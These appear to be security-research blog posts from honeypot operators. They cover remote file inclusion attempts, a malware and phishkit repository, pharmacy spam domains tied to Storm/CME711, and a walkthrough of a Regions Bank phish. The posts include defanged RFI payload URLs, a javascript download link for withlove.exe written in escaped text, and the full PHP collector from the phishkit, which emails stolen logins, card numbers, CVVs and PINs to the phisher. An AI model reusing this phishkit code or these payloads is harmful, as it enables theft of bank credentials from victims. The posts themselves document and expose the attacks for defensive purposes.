RFI's and Phishing Tricks

Our Honeypots have been hit with a rash of RFI's lately - we count over 1600 attempts from Feb 20-Feb 29. Some of the higher numbered attempts are listed below.

(71) http://www[dot]gumgangfarm[dot]com/shop/data/id[dot]txt
(53) http://www[dot]geocities[dot]com/giwel/file/id[dot]txt
(48) http://www[dot]tuttoscemo[dot]com/administrator/components/com_juser/id[dot]txt
(44) http://www[dot]tirateuncentro[dot]com/components/com_extcalendar/safe1[dot]txt
(44) http://mensagenss[dot]hospedagemdesite[dot]com/bot/safe[dot]txt
(42) http://www[dot]upload2world[dot]com/pic76/upload2world_e439c[dot]gif
(42) http://www[dot]upload2world[dot]com/pic76/upload2world_85356[dot]gif
(40) http://www[dot]upload2world[dot]com/pic76/upload2world_4d669[dot]gif
(38) http://proxysx[dot]t35[dot]com/cmd2[dot]txt
(37) http://www[dot]tukangbecak[dot]com/ban[dot]gif
(36) http://www[dot]upload2world[dot]com/pic76/upload2world_4d669[dot]gif
(36) http://anjink[dot]co[dot]cc/gen/mix[dot]txt
(33) http://heidik[dot]org/canar/cmdaff
(32) http://horseshoebendarkansas[dot]net/blog/nucleus/libs/include/safe[dot]txt
(32) http://heidik[dot]org/canar/safe[dot]txt
(29) http://www[dot]watbowon[dot]org/Joomla1011th/cache/id[dot]txt
(29) http://jobarte[dot]t35[dot]com/cmdtotal[dot]txt
(26) http://www[dot]iblon[dot]it/images/stories/test1[dot]txt
(23) http://www[dot]scrappysonline[dot]com/store/skin1/can
(21) http://www[dot]pricetrim[dot]com/counter/auction[dot]txt
(21) http://stmikx[dot]freehoxt[dot]com/Sekip/id[dot]txt
(20) http://www[dot]rangersales[dot]com/images/can

These are likely automatic crawlers - botnet stuff. We've seen attacks on honeypots that haven't been indexed in almost 6 months.

Thankfully most of these sites quickly removed the exploit code. There are still some that are live as of this post. A few of these RFI's are located on sites that have been compromised by attackers only hours earlier.

Following some code like this, we spoke with a system administrator who asked to remain anonymous. He kindly offered system logs from a site that we identified as compromised. The site was serving a paypal phish (and has been taken offline).

In the logs were several attempts to download packages from enache.3x.ro. Some investigation revealed that this site held a number of phishing and exploit packages for both windows and unix. The site has been removed by the hosting provider, 3x.ro. Some of the binaries tripped the following AV signatures:

Backdoor.Linux.Phobi.A, Backdoor.Linux.Zorg.B, DOS.Linux.Blitz, Generic.Slapper.E69A1FF5, Generic.XPL.Samba.E2FFD420, Linux.RST.B, Trojan.Dos.Linux.Slice.B, Trojan.Exploit.Linux.Brk.C, Trojan.Exploit.Linux.Brk.D, Trojan.Exploit.Linux.Brk.E, Trojan.Exploit.Linux.Race.B Trojan.Exploit.Linux.Race.C, Trojan.Flooder.Linux.Silly.B, Trojan.Flooder.Linux.Smurf.B, Trojan.Hacktool.Flood.A, Trojan.Hacktool.Linux.Bf.B Trojan.Hacktool.Linux.Pscan.A, Trojan.Hacktool.Linux.Small.B, Trojan.Horse.(AV|BU|BY|CA|CB|CC|CE|CF|CI), Trojan.Linux.Hacktop.B Trojan.Linux.Mircforce.B, Trojan.Linux.Rootkit.C, Trojan.Linux.Rootkit.N, Trojan.Linux.Rootkit.SA, Trojan.Rootkit.Linux.Agent.SH Trojan.Rootkit.Linux.Agent.Y, Virtool.Linux.Shark.A, Virtool.Linux.Sshscan.A, Win32.Parite.B, Win32.Worm.Linux.Adore.A, Worm.Linux.Lion.A

In total there were over 80 packages on the site. Of those, 14 of them were phishkits:

Arsenal Credit Union (Account Information emailed to mefy12345@gmail.com)
E-Trade (Account information emailed to giianny@yahoo.com)
Paypal (Account information emailed to proces.verbal@yahoo.com or micumicu1@gmail.com)
Banca Intesa (Account information emailed to muielagaborisilavoi@gmail.com)
Mid America Bank (Account information emailed to varu2005@gmail.com or telefon.mobil@yahoo.com)
Poste Italiane (Account information emailed to catalinum@yahoo.com)
First Interstate Bank (Account information emailed to sbrns51@gmail.com)
Gesa Credit Union (Account information emailed to mefy12345@gmail.com)
USF Federal Credit Union (Account information emailed to mist3ry@evoreal.net and k0rd1t@yahoo.com)
Wachovia (Account information emailed to telefon.mobil@yahoo.com or m3fystutzu@yahoo.com)
Capital One (Account information emailed to hai.cu.spamu@gmail.com)
ICBA (Account information emailed to mefy12345@gmail.com)
Oregon Community Credit Union (no email address assigned)
UCCU (Account information emailed to proces.verbal@yahoo.com)

While none of these kits used it, we've noticed that the ED/Pharmacy site spams hitting our mailboxes are using favicon.ico files of a padlock icon and sporting hacker safe logos. - A trick said to be coined by L. Jean Camp



This image plays on the statements IT people have made for years: Watch for the padlock icon to identify secure sites.
I think we need to modify our statement: Click the padlock icon, and verify who you're doing business with.
Who knows how many users this has fooled - and how many phishing sites have/will follow suite.

Pharmacy related sites - the work of CME711?

Over the last few months there has been a large number of domains registered for what appears to be pharmacy related sites.

Many of the sites are using 5 minute TTL's with multiple A records.

Possibly related, Websense posted this today: http://www.websense.com/securitylabs/blog/blog.php?BlogID=170

Websense believes the spam they have seen is related to Storm/CME711. Its very likely that these domains are also related, but I'm stopping short of claiming that at this time.

~400 examples are:

24storerx.org, aacsrwalty.com, aadwsv.shipany.cn, aaqpsh.flowsame.com, actand.com, aftersilent.com, agoeven.com, agosurface.com, agreecopy.com, agreedoctor.com, aktzu.centurytie.cn, alsochair.com, alsoother.com, alwaysgive.cn, amonggold.com, ancorrect.cn, angerbest.com, ao.drawdecide.com, aokhb.termcrop.com, atg.imagineoh.com, barhair.com, barresult.cn, basicsat.com, baspul.com, bbm.drawdecide.com, beautywest.cn, bestgoodguide.com, bestgrayso.com, besthotelsoxford.com, bestpillstick.com, bestrateon.com, bestwhiteso.com, bestwhitso.com, betweengrass.cn, bhi.wishlisten.com, bigbonger.com, boatnor.cn, bothstill.cn, brightmany.com, bringheart.com, bringpay.cn, brotherwhose.com, buteat.com, buychange.cn, bvogiwr.movesince.com, canwehost.com, cardfresh.cn, carrystood.com, cattable.com, causechild.com, causeshare.cn, centurytie.cn, cheaptmundo.com, chekdirecto.com, chekguia.com, chektierra.com, chickcourse.cn, chiefthird.cn, childturn.cn, chinaonworld.com, colonystone.cn, containadd.com, containyour.com, continueboy.com, continuedouble.com, cooktwo.com, cornerbrother.com, cottondecimal.com, countplace.com, courserule.cn, coverhuman.com, coverpiece.com, creasefine.cn, cureabc.org, dangerwhose.com, davort.com, decidedoor.cn, decideshort.cn, decimalmuch.com, desertother.com, desertsure.com, desertthat.com, develophold.cn, developstudy.com, dgani.throwline.cn, dhino.lookstretch.com, didsoil.com, directdrugred.com, divideif.cn, dkqkao.shallask.com, dogloud.cn, doublespeech.cn, downminute.com, drawdecide.com, ducksong.cn, d.wishlisten.com, e4rxmeds.org, eabch.subtracttree.cn, earlyspot.com, earlywarm.com, eastman.sailhim.com, edgeatom.com, edgegive.com, efp.onewhole.cn, eioow.speeddegree.com, elsedear.com, endlet.cn, entercame.com, eromeds.com, esplhaf.whatshore.com, evenspot.cn, exceptboat.com, experimentshore.cn, factclose.com, fairengine.com, farmmonth.com, fdrei.butseem.cn, feartold.cn, feeddark.com, feedhat.com, fewreason.com, filllead.com, finalmine.com, fitglad.com, flategg.com, flatread.com, flatrub.com, flowerfeet.cn, forcechord.com, foundby.cn, foxlawonline.com, friendgun.cn, fromport.cn, fuvlma.suddensilver.cn, fvzyevo.girlroot.cn, fxzhpu.wishlisten.com, gaswent.com, g.greatsoxdirect.com, gladfarm.com, glassneighbor.com, gohour.cn, goldfear.cn, gonwodm.syllablewill.cn, goodmoodman.com, gotdraw.com, goyapas.net, greatsoxdirect.com, groundoil.cn, groupseem.com, growfell.com, guessbegan.com, hadstop.cn, happenrepeat.cn, hardsummer.cn, hasout.com, healthdivision.org, heardweight.cn, heardwinter.cn, heatpractice.cn, heavyclass.com, heavyobserve.com, hopeyoung.com, hoqte.wishlisten.com, hurryrecord.com, iabqs.lightcapital.cn, ideathan.com, iffraction.cn, imagineanimal.cn, imagineoh.com, imscin.troublesea.cn, intereststudy.com, int-pharma.com, iqdod.spokeeye.cn, iteffect.cn, iwihjb.largeprobable.com, joysurprise.com, kcooj.shipany.cn, kebird.com, kemtkbo.vowelthrough.cn, kingrx.org, largeprobable.com, leadposition.cn, learndegree.cn, leastcall.com, lessvoice.cn, levelsmell.cn, liftduck.cn, liftmatter.com, lightcapital.cn, lookstretch.com, lotthink.com, lovelypills.com, lovepharmcheck.com, lowgood.cn, luecq.whothese.com, l.wishlisten.com, matternote.cn, meantplace.com, measureremember.com, medicalplacetrade.com, medisuccess.com, medsalon.org, medsbuzz.org, medscit.com, medselectron.org, medsher.com, medsjumbo.org, medsonline-new.com, medsplacecolor.com, medsqualitynecessary.com, medssuperstore.org, megumw.beginclimb.cn, melodylone.com, memountain.com, middlecircle.cn, miletake.com, minf.imagineoh.com, mixevery.com, mloism.spokeeye.cn, moment4medical.org, monthlength.com, mountainforward.com, mountstate.com, mountwide.com, mouthsell.com, muchwrite.com, musicindicate.com, musiclarge.com, mw.imagineoh.com, my24meds.com, nearred.com, nearvisit.com, neckespecially.cn, neckfavor.com, newpillsfour.com, ninepaint.com, nirmteq.beautywest.cn, nitrousoxideonline.com, nnusint.caughtkept.com, northfit.cn, ns1.kepcar.com, ns1.podezm.com, ns1.zipolt.net, ns2.bilepa.com, ns2.podezm.com, ns2.telyxnet.com, ns2.zipolt.net, ns4.medabcs.org, oilhow.com, one-edmeds.com, onlinedrugsset.com, onlyexcept.com, onron.intereststop.cn, ooghh.teachclimb.com, opensrx.org, orderhold.com, orx.wishlisten.com, ourroyaloem.net, ownfull.cn, ownreach.cn, parenthorse.cn, partcolumn.cn, particularprint.com, pathexperiment.com, pav.greatsoxdirect.com, pharma-vo.com, pharm-edone.com, pharmonlineyou.com, pharmplaceleave.com, pharm-x-press.com, piecestreet.com, pills33.com, planetclaim.com, playduring.cn, prettyevery.com, productagain.com, propersince.com, protectphrase.com, provethird.cn, psbq.measureremember.com, psezanm.saycame.com, pushfamily.com, p.wishlisten.com, qaicnlj.servehit.cn, qee.presentfly.com, qourm.takeresult.cn, quiteyour.com, raiseend.com, raisesnow.com, rangepattern.com, rangorp.net, rathershape.com, reasonso.com, requireisland.com, ridepossible.com, risecheck.com, rj.wishlisten.com, rollspeak.com, roomcaught.cn, roothad.cn, roundstand.cn, royaloemsoft.com, rqopsip.amonghand.cn, ruborse.com, rulespring.com, rx800.org, rxcounts.org, rxhandsup.org, rxonlinethe.com, rxqualitypresent.com, safechief.cn, samanthafoxsite.com, samosahead.com, sandnatural.com, scorebed.com, seamoment.com, seasonchance.com, seatfeel.cn, segmentsign.cn, selfoh.com, sentencewe.com, servehit.cn, setcross.cn, settlechord.com, settlelie.cn, settletone.com, shecommon.cn, shefill.com, shipany.cn, singwill.com, sisterexact.com, sitepharmgarden.com, sizetruck.com, sleepburn.cn, snowseat.com, softbestgrand.com, softsiteprovide.com, softwareonlinemuch.com, solvewest.cn, sonrain.com, sosgay.subtracttree.cn, speakgas.com, speakpound.com, speeddegree.com, spokeeye.cn, springexcept.com, squareway.cn, standwheel.com, starsrx.org, statewas.com, stretchstar.com, strongmust.com, subtracttree.cn, suggestgrand.cn, suggestleave.com, suitconnect.com, suitleast.com, surefinal.com, tablewhose.com, tailevent.cn, thanpopulate.com, thebetterredso.com, thechiso.com, thepawso.com, theredsoxes.com, thereseason.com, theseatsoxfactory.com, thinspace.cn, thoughtmouth.cn, thoughwalk.com, tmhued.creasefine.cn, to.drawdecide.com, toldexact.com, toldwhere.com, tomdef.com, touchwild.cn, towardvary.com, treecase.com, treetriangle.cn, truckclimb.com, uesjpm.servehit.cn, umajct.subtracttree.cn, unmos.shipany.cn, untilport.cn, uplone.com, verbalso.com, villagedepend.cn, vowellow.com, vowelthrough.cn, walkmore.cn, weekinvent.cn, weekown.com, wfa.drawdecide.com, whatcurrent.com, whensafe.com, whoseour.cn, whothese.com, whyallow.com, willcat.cn, windowloud.com, wintersilent.com, wishlisten.com, wquos.latebring.com, wroteplan.com, wyk.wishlisten.com, xpt.wishlisten.com, xznluo.statejoin.cn, youngchord.com, yourcrease.com, yyoat.suddenfull.com, zkgio.sharecontrol.cn, z.wishlisten.com

These domains share many of the same A records, which is what caught my attention.
More information available as soon as I know more.

CME711: Happy Valentines Day and Halifax phish

The CME711 gang has changed their tactics again. We've started seeing emails in our mail drops with pointers to nodes serving "withlove.exe" and "with_love.exe".

So far they have reverted back to sending IP's in the email body, which makes it easy for most spam filters to catch.

The website code looks the same as in previous runs, with false binaries in comments and the greeting:

Your download should begin shortly. If your download does not start
in 10-20 seconds, you can click hereto launch the download
and then press Run

The link is a javascript: document.write( unescape( '%3C%61%20%68%72%65%66%3D%22%77%69%74%68%5F%6C%6F%76%65%2E%65%78%65%22%3E%0D%0A' ) );

That javascript translates to withlove.exe -- Additionally there is an image of a pink heart on the page that links to with_love.exe. You may wish to update your snort signatures.

Additionally we're tracking a phish using stormworm fastflux nodes with the domain ibank-halifax.com.

Walking through a phish site.

I just received this email in my inbox and figured some readers would enjoy some light reading.

Online Banking

Dear Regions Bank member,


We'd like to inform you that your Message Center has 1 new message. Please log in immediately and read the message. The Message Center contains only important information about your account and online banking.

Please follow this link in order to read your message:

http://tinyurl.com/2qzwsr

Choosing to ignore this message will result in a temporary suspension of your account within 24 hours, until you will choose to solve this unpleasant situation.

Sincerely,
RegionsNet Online Banking

All of my phish emails go to CastleCops, and I enjoy helping them out by doing the first bit of research on my own. I started by figuring out where the TinyURL is pointing. You can do this by setting a cookie "preview=1" before visiting the page, fetching the page with wget, or running a proxy like Paros or WebScarab. According to TinyURL, the 2qzwsr redirect points to "http:// backup.iirt .net/ icons/ www.regions bank.com/ EBanking/ logon/" where we are greeted with:


Now phishers aren't the brightest bunch. In fact the majority of them are down right stupid. By backing up a few directories, we're able to find an open index. It was probably accidentally left open by the web master. The stupid part is, the phisher didn't even bother to remove his kit: "http://backup. iirt.net/ icons/ regions.tgz"

In the archive we find: /www.regionsbank.com/EBanking/logon/done.php:

session_start();

$j_username = $_SESSION['j_username'];
$j_password = $_SESSION['j_password'];
$name = $HTTP_POST_VARS['name'];
$address = $HTTP_POST_VARS['address'];
$city = $HTTP_POST_VARS['city'];
$state = $HTTP_POST_VARS['state'];
$zip = $HTTP_POST_VARS['zip'];
$p1 = $HTTP_POST_VARS['p1'];
$p2 = $HTTP_POST_VARS['p2'];
$p3 = $HTTP_POST_VARS['p3'];
$card = $HTTP_POST_VARS['card'];
$expm = $HTTP_POST_VARS['expm'];
$expy = $HTTP_POST_VARS['expy'];
$cvv = $HTTP_POST_VARS['cvv'];
$pin = $HTTP_POST_VARS['pin'];
$ip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
$date = date("D M d, Y g:i a");

//sending email info here
$subj = "| CC: $card | EXP: $expm/$expy | CVV: $cvv | PIN: $pin |";
$msg = "Username: $j_username\nPassword: $j_password\nCardHolder Name: $name\nAddress: $address\nCity: $city\nState: $state\nZip: $zip\nPhone Number: $p1-$p2-$p3\nCredit Card Number: $card\nExpiration Date: $expm / $expy\nCvv: $cvv\nPin: $pin\n\n[ IP: $ip | $date ]";
$from = "From: Regions Bank";
mail("peacolo3@yahoo.com", $subj, $msg, $from);
header("Location: http://www.regions.com");

?>

So victim data is emailed to peacolo3@yahoo.com. We could send Mr Peacolo a nice email, but that could be considered baiting him...and we'd never do that..right? :)

Emails were sent to hostmaster@iirt.net and the phish was forwarded to CastleCops.

So grab your line, and go anti-phishing. -- For what its worth, TinyURL killed the site while I was writing this. Good job TinyURL.